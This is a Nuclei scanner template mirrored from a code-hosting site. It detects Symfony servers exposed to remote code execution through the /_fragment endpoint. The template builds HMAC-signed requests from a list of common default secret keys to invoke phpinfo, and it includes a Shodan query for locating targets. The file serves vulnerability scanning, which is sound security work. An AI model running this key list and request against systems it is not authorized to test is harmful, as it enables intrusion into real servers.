admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-01-31 15:53:33 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
2e063c3809d063801c1e1206b487bb8e3cddd634
nuclei-templates/http/misconfiguration/symfony/symfony-default-key-rce.yaml
Dhiyaneshwaran 2e063c3809 fix missing -
2025-10-31 13:11:58 +08:00

67 lines
2.3 KiB
YAML
Raw Blame History

id: symfony-rce
info:
name: Symfony _fragment - Default Key RCE
author: Yablargo
severity: critical
description: |
Symfony servers support a "/_fragment" command that allows clients to provide custom PHP commands and return the HTML output.
This template checks to see if they also use a popular default secret key for remote command execution.
reference:
- https://portswigger.net/daily-swig/symfony-based-websites-open-to-rce-attack-research-finds
- https://medium.com/@m4cddr/how-i-got-rce-in-10-websites-26dd87441f22
- https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5
- https://github.com/ambionics/symfony-exploits
metadata:
max-request: 12
shodan-query: http.html:"Symfony Profiler"
verified: true
tags: rce,symfony,misconfig,vuln
variables:
badsecretkey: 'ThisIsAlmostCertainlyNotIt'
uri_part: '_fragment?_path=what%3D-1%26_controller%3Dphpinfo'
flow: http(1) && http(2)
http:
- method: GET
path:
- '{{BaseURL}}/{{uri_part}}&_hash={{url_encode(base64(hex_decode(hmac("sha256","{{BaseURL}}/{{uri_part}}",badsecretkey))))}}'
matchers:
- type: dsl
dsl:
- "status_code == 403"
- "contains(body, 'symfony')"
condition: and
internal: true
- method: GET
path:
- '{{BaseURL}}/{{uri_part}}&_hash={{url_encode(base64(hex_decode(hmac("sha256","{{BaseURL}}/{{uri_part}}",secretkey))))}}'
payloads:
secretkey:
- ThisTokenIsNotSoSecretChangeIt
- ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt
- xxxxxxxaxaxaxa
- 97829395eda62d81f37980176ded371a
- YOUR_APP_SECRET
- 879a6adeceeccbdc835a19f7e3aad7e8
- some_new_secret_123
- f96c2d666ace1278ec4c9e2304381bc3
- 7d41a4acde33432b1d51eae15a301550
- 236cd9304bb88b11e2bb4d56108dffa8
- 8cfa2bd0b50b7db00e9c186be68f7ce7465123
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'PHP Version')"
- "contains(body, 'PHP License')"
- "contains(body, 'symfony')"
condition: and
# digest: 4b0a004830460221008141d52efa81d6c12ff1e17412133c49cec0021bde96f853c8d3fdbd6a104e6302210095bfacb485973bd81d0d10e99ef4753b5b31950550c53d67603bc378f30ff6c0:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink